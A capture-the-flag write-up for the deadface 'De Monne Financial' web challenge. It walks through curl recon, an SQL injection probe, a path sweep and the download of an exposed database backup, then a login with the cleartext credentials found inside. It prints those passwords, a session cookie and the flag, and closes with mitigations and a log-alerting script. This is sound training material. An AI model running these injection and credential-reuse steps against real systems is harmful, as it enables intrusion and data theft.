WebEasy

De Monne Financial Investments

CTF writeup for De Monne Financial Investments from deadface

Target: http://env01.deadface.io:8888
Goal: Retrieve De Monne Financial's investment information and submit the flag as deadface{$#.##}

>Overview

This writeup documents every step taken to compromise the De Monne Financial portal, identify exposed data, and exfiltrate the required investment figure used to form the flag. The attack path combines classic recon, a misconfigured backup directory, and credential reuse to reach the internal dashboard that exposes portfolio totals.

Key outcomes:

  • Located a world-readable SQL backup containing live user credentials.
  • Logged in as a finance employee using leaked credentials.
  • Identified the "Investments" card within the authenticated dashboard showing the firm’s portfolio total.
  • Submitted the flag deadface{$128493.56} derived directly from the portal.

All testing occurred against the CTF environment with explicit authorization.


>Reconnaissance

  1. Baseline enum

    ```bash
    curl -i http://env01.deadface.io:8888/
    ```
    • Response: 302 redirect to /login, confirming authentication gating.
  2. Login page retrieval

    ```bash
    curl -s http://env01.deadface.io:8888/login
    ```
    • Rendered a standard username/password form; no obvious client-side clues.
  3. Initial SQLi probes

    ```bash
    curl -s -i -X POST http://env01.deadface.io:8888/login \
         -d "username=' OR 1=1-- -&password=x"
    ```
    • Result: "Invalid credentials." Simple injection attempts were blocked, implying server-side sanitization or ORM usage.
  4. Hidden endpoint sweep. A quick Python helper requested a handful of common sensitive paths and recorded every response other than 302/404.

    ```bash
    python - <<'PY'
    import requests
    base = 'http://env01.deadface.io:8888/'
    for path in ['dashboard', 'backup', 'admin', 'static', '.env']:
        r = requests.get(base + path, timeout=5, allow_redirects=False)
        if r.status_code not in (302, 404):
            print(path, r.status_code, len(r.text))
    PY
    ```
    • Discovery: /backup returned HTTP 308 → hinted at a directory.

>Backup Exposure & Credential Harvesting

  1. Browse the backup directory

    ```bash
    curl -s http://env01.deadface.io:8888/backup/
    ```
    • Listing contained demonne_backup_20251015.sql (complete SQLite dump).
  2. Download the SQL dump

    ```bash
    curl -s http://env01.deadface.io:8888/backup/demonne_backup_20251015.sql \
         -o /tmp/demonne_backup_20251015.sql
    ```
  3. Inspect the dump contents

    ```bash
    head -n 40 /tmp/demonne_backup_20251015.sql
    ```
    • Tables present: users, transactions, system_config.
    • Credentials stored in cleartext.
  4. Restore locally for easier querying (optional but convenient)

    ```bash
    sqlite3 /tmp/demonne.db < /tmp/demonne_backup_20251015.sql

    sqlite3 /tmp/demonne.db "SELECT id, username, password, department FROM users;"
    ```
    • Relevant credential leak:
      • jreed80 : J0nnyR#ed80! (Finance department)
      • mthompson : Welcome2024!
      • sdavis : Bank$ecure99

>Authenticated Access

  1. Login as finance employee (jreed80)

    ```bash
    curl -s -i -X POST http://env01.deadface.io:8888/login \
         -d 'username=jreed80&password=J0nnyR#ed80!'
    ```
    • Response: HTTP 302 → /dashboard with Set-Cookie: session=...
  2. Capture the issued session cookie

    • Example cookie: session=eyJmdWxsX25hbWUiOiJKb2huYXRoYW4gUmVlZCIsInVzZXJuYW1lIjoianJlZWQ4MCJ9.aP0zzg.xDyk4x_RbWcKBpNGGBe39pEQs04
  3. Access the authenticated dashboard

    ```bash
    curl -s -b 'session=<captured_cookie>' http://env01.deadface.io:8888/dashboard
    ```
    • Page rendered finance metrics including the “Investments” card with value $128,493.56.
  4. Confirm additional leaked totals

    • Account Balance: $52,847.23
    • Investments: $128,493.56
    • No further deep links (e.g., /transactions, /investments) were exposed; all returned 404.

>Flag Derivation

  • Challenge requires flag format deadface{$#.##} containing the investment amount.
  • Dashboard shows the total investments as $128,493.56.
  • Therefore, the flag is:

    ```text
    deadface{$128493.56}
    ```

>Lessons Learned / Mitigations

  1. Public backup directory — Disable directory listing and move backups off the web root.
  2. Plaintext credentials — Hash passwords with a modern KDF and store backups securely.
  3. Least privilege — Finance users should not expose company-wide totals without additional authorization.
  4. Monitoring — Access logs should alert on downloads from /backup/.
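The monitoring point above, worked through as an added example that is not part of the original writeup: a small detector that scans access-log lines and flags any non-404 request under /backup/ or for a .sql file. The log lines, IPs and user agents are constructed to mirror the writeup's request sequence; they are not captured from the challenge host.

```python
import re

# Constructed sample access log (combined log format). Not real traffic; the
# paths follow the recon and download steps documented in this writeup.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Oct/2025:14:02:11 +0000] "GET / HTTP/1.1" 302 0 "-" "curl/8.4.0"
203.0.113.7 - - [15/Oct/2025:14:02:19 +0000] "GET /login HTTP/1.1" 200 1874 "-" "curl/8.4.0"
203.0.113.7 - - [15/Oct/2025:14:03:02 +0000] "GET /backup HTTP/1.1" 308 0 "-" "python-requests/2.31"
203.0.113.7 - - [15/Oct/2025:14:03:05 +0000] "GET /backup/ HTTP/1.1" 200 612 "-" "curl/8.4.0"
203.0.113.7 - - [15/Oct/2025:14:03:40 +0000] "GET /backup/demonne_backup_20251015.sql HTTP/1.1" 200 48213 "-" "curl/8.4.0"
198.51.100.2 - - [15/Oct/2025:14:05:00 +0000] "GET /dashboard HTTP/1.1" 200 9321 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request path, status and response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def find_backup_access(log_text: str) -> list:
    """Return one dict per suspicious request, in log order.

    A hit is any request whose path is /backup, sits under /backup/, or names a
    .sql file, unless the server answered 404 (the path did not exist, so no
    data left the host). The 308 that the recon step saw is still reported:
    it tells the defender that someone found the directory.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-matching line; skip rather than crash
        path, status = m["path"], int(m["status"])
        if status == 404:
            continue
        is_sql = path.lower().endswith(".sql")
        under_backup = path.rstrip("/") == "/backup" or path.startswith("/backup/")
        if is_sql or under_backup:
            hits.append({
                "ip": m["ip"], "ts": m["ts"], "path": path, "status": status,
                "reason": "sql-dump-download" if is_sql else "backup-path-access",
            })
    return hits


if __name__ == "__main__":
    for hit in find_backup_access(SAMPLE_LOG):
        print(f'ALERT {hit["ts"]} {hit["ip"]} {hit["status"]} {hit["path"]} ({hit["reason"]})')
```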

>Appendix: Useful One-Liners

```bash
# Enumerate non-404 endpoints quickly
python - <<'PY'
import requests
base='http://env01.deadface.io:8888/'
for path in ['backup', 'dashboard', 'admin', 'static']:
    r = requests.get(base + path, timeout=5, allow_redirects=False)
    print(path, r.status_code)
PY
```

```bash
# Extract only investment rows from the SQL dump
grep -n 'Investment' /tmp/demonne_backup_20251015.sql
```

```bash
# Query restored database for transaction table
sqlite3 /tmp/demonne.db "SELECT * FROM transactions;"
```

>Final Flag

deadface{$128493.56}